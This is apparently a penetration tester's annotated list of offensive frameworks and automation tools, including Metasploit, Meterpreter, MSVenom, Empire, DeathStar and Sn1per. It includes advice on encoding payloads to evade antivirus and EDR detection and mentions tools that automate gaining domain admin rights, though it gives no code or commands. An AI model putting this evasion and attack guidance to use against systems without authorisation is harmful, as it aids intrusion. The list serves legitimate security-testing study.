The one offensive framework to rule them all. By far the most popular, Metasploit has become a staple for penetration testers everywhere. Metasploit contains 3 basic components you need to know.
Metasploit modules are the exploit commands and code needed to exploit a specific vulnerability. There are tons of them and more are constantly added to the database when new exploit code is developed. For those looking to take the infamous OSCP exam, the exploit code itself can be used on the exam, but can only be used once through Metasploit itself for auto-exploitation.
Merterpreter is the advanced shell that comes with Metasploit. It comes with a slew of added commands you would not be able to use in a traditional shell, including easy privilege escalation. This shell has become easier and easier to detect with AV and EDR solutions, so advanced encoding is usually required, but well worth the effort.
MSVenom is a tool that can encode your payloads to bypass detection by your targets defenses. You will quickly get used to encoding everything you use. You can even chain encodings together
Cortana-scripts - A collection of Cortana scripts that you may use with Armitage and Cobalt Strike 2.x. Cortana Scripts are not compatible with Cobalt Strike 3.x. Cobalt Strike 3.x uses a variant of Cortana called Aggressor Script.
Meterpreter - The multi-function, super flexible, auto escalating shell by Metasploit
Meterpreter - The multi-function, super flexible, auto escalating shell by Metasploit
Mettle - Meterpreter portable version! This is an implementation of a native-code Meterpreter, designed for portability, embedability, and low resource utilization. It can run on the smallest embedded Linux targets to big iron, and targets Android, iOS, macOS, Linux, and Windows, but can be ported to almost any POSIX-compliant environment.
Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and flexible architecture.
Empire was formerly an abandoned project that BC-Securty has revived. Please be aware when reading old posts or guides about Emipre that they may not be completely accurate to the new version of the project.
DeathStar - A Python script that uses Empire's RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.
Starkiller - Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS.
Sn1per - Discover the attack surface and prioritize risks with our continuous Attack Surface Management (ASM) platform - Sn1per Professional. For more information, go to https://xerosecurity.com.
legion - Legion is a tool that uses several well-known opensource tools to automatically, semi-automatically or manually enumerate the most frequent found services running in machines that you could need to pentest. Written by Carlos Pollop, the creator of WinPEAS, LinPEAS, and book.hacktricks, everything this guy makes is gold. Highest of recommendations
celerystalk - celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run. Super handy for stringing together all your favorite tools
lscript - Lazy Script: This is a script for Kali Linux that automates many procedures about wifi penetration and hacking.
KatanaFramework - Katana is a framework written in python for penetration testing, based on a simple and comprehensive structure for anyone to use, modify, and share.
Osmedeus - Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.
OWASP/Nettacker - OWASP Nettacker project is created to automate information gathering, vulnerability scanning and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information.
sifter - Sifter is a fully stocked Op Centre for Pentesters. It combines a pleothara of OSINT, recon and vulnerability analysis tools within categorized modsets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsoft and if unpatched, exploit them.
jok3r - Jok3r is a Python3 CLI application which is aimed at helping penetration testers for network infrastructure and web black-box security tests.
Xerror - Xerror is an automated penetration tool , which will help security professionals and non professionals to automate their pentesting tasks.
WinPwn - Powershell based recon and exploitation script with automatic proxy recognition and integration.
axiom - The dynamic infrastructure framework for everybody! Distribute the workload of many different scanning tools with ease, including nmap, ffuf, masscan, nuclei, meg and many more!